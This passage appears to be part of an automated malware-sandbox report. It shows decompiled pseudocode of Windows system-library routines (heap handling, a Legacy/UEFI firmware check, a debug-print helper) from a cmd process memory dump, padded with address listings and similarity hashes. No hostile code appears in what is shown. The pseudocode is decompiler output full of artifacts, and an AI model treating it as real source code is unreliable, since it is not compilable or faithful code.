					if(E03C9A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03C19730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E03C9A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E03C9A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03BF2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E03BEB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E03BEFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03BF7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E03C8FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                                                          0x03c9e547
                                                                                                                                          0x03c9e549
                                                                                                                                          0x03c9e54f
                                                                                                                                          0x03c9e553
                                                                                                                                          0x03c9e557
                                                                                                                                          0x03c9e55a
                                                                                                                                          0x03c9e55c
                                                                                                                                          0x03c9e55f
                                                                                                                                          0x03c9e561
                                                                                                                                          0x03c9e567
                                                                                                                                          0x03c9e56b
                                                                                                                                          0x03c9e7e2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e571
                                                                                                                                          0x03c9e575
                                                                                                                                          0x03c9e577
                                                                                                                                          0x03c9e57b
                                                                                                                                          0x03c9e57c
                                                                                                                                          0x03c9e57d
                                                                                                                                          0x03c9e57e
                                                                                                                                          0x03c9e57f
                                                                                                                                          0x03c9e588
                                                                                                                                          0x03c9e58f
                                                                                                                                          0x03c9e591
                                                                                                                                          0x03c9e592
                                                                                                                                          0x03c9e592
                                                                                                                                          0x03c9e596
                                                                                                                                          0x03c9e59e
                                                                                                                                          0x03c9e5a0
                                                                                                                                          0x03c9e5a6
                                                                                                                                          0x03c9e61d
                                                                                                                                          0x03c9e61d
                                                                                                                                          0x03c9e621
                                                                                                                                          0x03c9e623
                                                                                                                                          0x03c9e630
                                                                                                                                          0x03c9e630
                                                                                                                                          0x03c9e7e6
                                                                                                                                          0x03c9e7eb
                                                                                                                                          0x03c9e7ed
                                                                                                                                          0x03c9e7f4
                                                                                                                                          0x03c9e7fa
                                                                                                                                          0x03c9e7ff
                                                                                                                                          0x03c9e7ff
                                                                                                                                          0x03c9e80a
                                                                                                                                          0x03c9e812
                                                                                                                                          0x03c9e812
                                                                                                                                          0x03c9e5ab
                                                                                                                                          0x03c9e5b4
                                                                                                                                          0x03c9e5b9
                                                                                                                                          0x03c9e5be
                                                                                                                                          0x03c9e5c0
                                                                                                                                          0x03c9e5c2
                                                                                                                                          0x03c9e5c8
                                                                                                                                          0x03c9e5c9
                                                                                                                                          0x03c9e5cb
                                                                                                                                          0x03c9e5cc
                                                                                                                                          0x03c9e5d5
                                                                                                                                          0x03c9e5e4
                                                                                                                                          0x03c9e5f1
                                                                                                                                          0x03c9e5f8
                                                                                                                                          0x03c9e5f8
                                                                                                                                          0x03c9e5d5
                                                                                                                                          0x03c9e602
                                                                                                                                          0x03c9e616
                                                                                                                                          0x03c9e63d
                                                                                                                                          0x03c9e644
                                                                                                                                          0x03c9e64d
                                                                                                                                          0x03c9e652
                                                                                                                                          0x03c9e657
                                                                                                                                          0x03c9e659
                                                                                                                                          0x03c9e65b
                                                                                                                                          0x03c9e661
                                                                                                                                          0x03c9e662
                                                                                                                                          0x03c9e664
                                                                                                                                          0x03c9e665
                                                                                                                                          0x03c9e66e
                                                                                                                                          0x03c9e67d
                                                                                                                                          0x03c9e68a
                                                                                                                                          0x03c9e691
                                                                                                                                          0x03c9e691
                                                                                                                                          0x03c9e66e
                                                                                                                                          0x03c9e6b0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e6b6
                                                                                                                                          0x03c9e6bd
                                                                                                                                          0x03c9e6c7
                                                                                                                                          0x03c9e6d7
                                                                                                                                          0x03c9e6d9
                                                                                                                                          0x03c9e6db
                                                                                                                                          0x03c9e6de
                                                                                                                                          0x03c9e6e3
                                                                                                                                          0x03c9e6f3
                                                                                                                                          0x03c9e6fc
                                                                                                                                          0x03c9e700
                                                                                                                                          0x03c9e700
                                                                                                                                          0x03c9e704
                                                                                                                                          0x03c9e70a
                                                                                                                                          0x03c9e70a
                                                                                                                                          0x03c9e713
                                                                                                                                          0x03c9e716
                                                                                                                                          0x03c9e719
                                                                                                                                          0x03c9e720
                                                                                                                                          0x03c9e761
                                                                                                                                          0x03c9e76b
                                                                                                                                          0x03c9e774
                                                                                                                                          0x03c9e77a
                                                                                                                                          0x03c9e77a
                                                                                                                                          0x03c9e78a
                                                                                                                                          0x03c9e791
                                                                                                                                          0x03c9e799
                                                                                                                                          0x03c9e79b
                                                                                                                                          0x03c9e79f
                                                                                                                                          0x03c9e7aa
                                                                                                                                          0x03c9e7c0
                                                                                                                                          0x03c9e7ac
                                                                                                                                          0x03c9e7b2
                                                                                                                                          0x03c9e7b9
                                                                                                                                          0x03c9e7b9
                                                                                                                                          0x03c9e7c7
                                                                                                                                          0x03c9e806
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e7c9
                                                                                                                                          0x03c9e7d1
                                                                                                                                          0x03c9e7d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e7d8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e722
                                                                                                                                          0x03c9e72e
                                                                                                                                          0x03c9e748
                                                                                                                                          0x03c9e74c
                                                                                                                                          0x03c9e754
                                                                                                                                          0x03c9e756
                                                                                                                                          0x03c9e75c
                                                                                                                                          0x03c9e75c
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e75c
                                                                                                                                          0x03c9e758
                                                                                                                                          0x03c9e758
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e758
                                                                                                                                          0x03c9e750
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e752
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e752
                                                                                                                                          0x03c9e730
                                                                                                                                          0x03c9e735
                                                                                                                                          0x03c9e73d
                                                                                                                                          0x03c9e73f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e741
                                                                                                                                          0x03c9e741
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e741
                                                                                                                                          0x03c9e739
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e73b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e73b
                                                                                                                                          0x03c9e722
                                                                                                                                          0x03c9e720
                                                                                                                                          0x03c9e6b0
                                                                                                                                          0x03c9e618
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9e618

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: `$`
                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                          • Instruction ID: c2aa43c8e9349fe0183b546142024b69816392a7b9784c5c18c0e288777fa446
                                                                                                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                                          • Instruction Fuzzy Hash: B091AE36204341AFEB24CE35CC48B1BB7E5AF94714F1A896EF595CB280E774E904CB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C551BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                          			E03C551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x3cb05f0);
				E03C2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E03BEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E03C553CA(0);
						return E03C2D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E03C1F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03BF3690(1, _t117, 0x3bb1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E03C1AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03BF4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E03C1AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E03C5500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03C19860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                                          0x03c551be
                                                                                                                                          0x03c551c3
                                                                                                                                          0x03c551c8
                                                                                                                                          0x03c551cd
                                                                                                                                          0x03c551d0
                                                                                                                                          0x03c551d3
                                                                                                                                          0x03c551d8
                                                                                                                                          0x03c551db
                                                                                                                                          0x03c551de
                                                                                                                                          0x03c551e0
                                                                                                                                          0x03c551e3
                                                                                                                                          0x03c551e6
                                                                                                                                          0x03c551e8
                                                                                                                                          0x03c55342
                                                                                                                                          0x03c55351
                                                                                                                                          0x03c55356
                                                                                                                                          0x03c5535a
                                                                                                                                          0x03c55360
                                                                                                                                          0x03c55363
                                                                                                                                          0x03c55366
                                                                                                                                          0x03c55369
                                                                                                                                          0x03c55369
                                                                                                                                          0x03c5536b
                                                                                                                                          0x03c5536b
                                                                                                                                          0x03c55370
                                                                                                                                          0x03c553a3
                                                                                                                                          0x03c553a4
                                                                                                                                          0x03c553a6
                                                                                                                                          0x03c553ab
                                                                                                                                          0x03c553ab
                                                                                                                                          0x03c553ae
                                                                                                                                          0x03c553ae
                                                                                                                                          0x03c553b5
                                                                                                                                          0x03c553bf
                                                                                                                                          0x03c553bf
                                                                                                                                          0x03c55375
                                                                                                                                          0x03c55396
                                                                                                                                          0x03c553a0
                                                                                                                                          0x03c553a0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c55396
                                                                                                                                          0x03c55377
                                                                                                                                          0x03c55379
                                                                                                                                          0x03c5537f
                                                                                                                                          0x03c5538c
                                                                                                                                          0x03c55390
                                                                                                                                          0x00000000
                                                                                                                                          0x03c55390
                                                                                                                                          0x03c551ee
                                                                                                                                          0x03c551f1
                                                                                                                                          0x03c55301
                                                                                                                                          0x03c55310
                                                                                                                                          0x03c55315
                                                                                                                                          0x03c55318
                                                                                                                                          0x03c5531b
                                                                                                                                          0x03c55320
                                                                                                                                          0x03c5532e
                                                                                                                                          0x03c55331
                                                                                                                                          0x00000000
                                                                                                                                          0x03c55331
                                                                                                                                          0x03c55328
                                                                                                                                          0x03c55329
                                                                                                                                          0x00000000
                                                                                                                                          0x03c55329
                                                                                                                                          0x03c551fa
                                                                                                                                          0x03c55235
                                                                                                                                          0x03c55236
                                                                                                                                          0x03c55239
                                                                                                                                          0x03c5523f
                                                                                                                                          0x03c55240
                                                                                                                                          0x03c55241
                                                                                                                                          0x03c55242
                                                                                                                                          0x03c55246
                                                                                                                                          0x03c55247
                                                                                                                                          0x03c5524e
                                                                                                                                          0x03c55251
                                                                                                                                          0x03c55267
                                                                                                                                          0x03c55269
                                                                                                                                          0x03c5526e
                                                                                                                                          0x03c5527d
                                                                                                                                          0x03c5527e
                                                                                                                                          0x03c55281
                                                                                                                                          0x03c55282
                                                                                                                                          0x03c55287
                                                                                                                                          0x03c55288
                                                                                                                                          0x03c5528a
                                                                                                                                          0x03c5528f
                                                                                                                                          0x03c55294
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c5529a
                                                                                                                                          0x03c5529c
                                                                                                                                          0x03c5529e
                                                                                                                                          0x03c5529e
                                                                                                                                          0x03c552a4
                                                                                                                                          0x03c552b0
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c552ba
                                                                                                                                          0x03c552bc
                                                                                                                                          0x03c552bc
                                                                                                                                          0x03c552d4
                                                                                                                                          0x03c552d9
                                                                                                                                          0x03c552dc
                                                                                                                                          0x03c552e1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c552e7
                                                                                                                                          0x03c552f4
                                                                                                                                          0x00000000
                                                                                                                                          0x03c552f4
                                                                                                                                          0x03c55270
                                                                                                                                          0x00000000
                                                                                                                                          0x03c55270
                                                                                                                                          0x03c551fc
                                                                                                                                          0x03c551fd
                                                                                                                                          0x03c55202
                                                                                                                                          0x03c55203
                                                                                                                                          0x03c55205
                                                                                                                                          0x03c5520a
                                                                                                                                          0x03c5520f
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c5521b
                                                                                                                                          0x03c55226
                                                                                                                                          0x03c5522b
                                                                                                                                          0x03c5521d
                                                                                                                                          0x03c5521d
                                                                                                                                          0x03c55222
                                                                                                                                          0x03c55222
                                                                                                                                          0x03c5522d
                                                                                                                                          0x00000000

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                          • Opcode ID: 843a57d542373554eeef8d2065ab801a6372609fcb9f615747acbcf38d18e2d3
                                                                                                                                          • Instruction ID: 0bce1d73cb6c3eafaafc7a42a57354b1b812444666fc5765ff20eb2af03021ca
                                                                                                                                          • Opcode Fuzzy Hash: 843a57d542373554eeef8d2065ab801a6372609fcb9f615747acbcf38d18e2d3
                                                                                                                                          • Instruction Fuzzy Hash: 1B518FB5E007089FDB24DFA9C840AADBBF8FF59700F14406DE94AEB251D771A980DB14
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E03BDB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x3caf7a8);
				E03C2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E03C2D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E03C1D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E03C1F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L03C2DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E03C1B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E03C1B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E03C1E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E03C1A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                          0x03bdb171
                                                                                                                                          0x03bdb171
                                                                                                                                          0x03bdb171
                                                                                                                                          0x03bdb171
                                                                                                                                          0x03bdb171
                                                                                                                                          0x03bdb176
                                                                                                                                          0x03bdb17b
                                                                                                                                          0x03bdb180
                                                                                                                                          0x03bdb186
                                                                                                                                          0x03bdb18f
                                                                                                                                          0x03bdb198
                                                                                                                                          0x03bdb1a4
                                                                                                                                          0x03bdb1aa
                                                                                                                                          0x03c34802
                                                                                                                                          0x03c34802
                                                                                                                                          0x03c34805
                                                                                                                                          0x03c3480c
                                                                                                                                          0x03c3480e
                                                                                                                                          0x03bdb1d1
                                                                                                                                          0x03bdb1d3
                                                                                                                                          0x03bdb1de
                                                                                                                                          0x03bdb1de
                                                                                                                                          0x03c34817
                                                                                                                                          0x03c3481e
                                                                                                                                          0x03c34820
                                                                                                                                          0x03c34822
                                                                                                                                          0x03c34822
                                                                                                                                          0x03c34824
                                                                                                                                          0x03c34824
                                                                                                                                          0x03c3482a
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34835
                                                                                                                                          0x03c3483a
                                                                                                                                          0x03c3483d
                                                                                                                                          0x03c3483f
                                                                                                                                          0x03c34842
                                                                                                                                          0x03c34842
                                                                                                                                          0x03c34842
                                                                                                                                          0x03c34846
                                                                                                                                          0x03c3484c
                                                                                                                                          0x03c3484e
                                                                                                                                          0x03c34851
                                                                                                                                          0x03c34851
                                                                                                                                          0x03c34853
                                                                                                                                          0x03c34854
                                                                                                                                          0x03c34854
                                                                                                                                          0x03c34858
                                                                                                                                          0x03c3485a
                                                                                                                                          0x03c3485a
                                                                                                                                          0x03c3485d
                                                                                                                                          0x03c3485f
                                                                                                                                          0x03c34861
                                                                                                                                          0x03c34861
                                                                                                                                          0x03c34866
                                                                                                                                          0x03c3486b
                                                                                                                                          0x03c3486e
                                                                                                                                          0x03c34871
                                                                                                                                          0x03c34876
                                                                                                                                          0x03c34876
                                                                                                                                          0x03c34878
                                                                                                                                          0x03c3487b
                                                                                                                                          0x03c34884
                                                                                                                                          0x03c34884
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3487d
                                                                                                                                          0x03c3487d
                                                                                                                                          0x03c34882
                                                                                                                                          0x03c34889
                                                                                                                                          0x03c34889
                                                                                                                                          0x03c3488f
                                                                                                                                          0x03c34891
                                                                                                                                          0x03c348e0
                                                                                                                                          0x03c348e2
                                                                                                                                          0x03c348e4
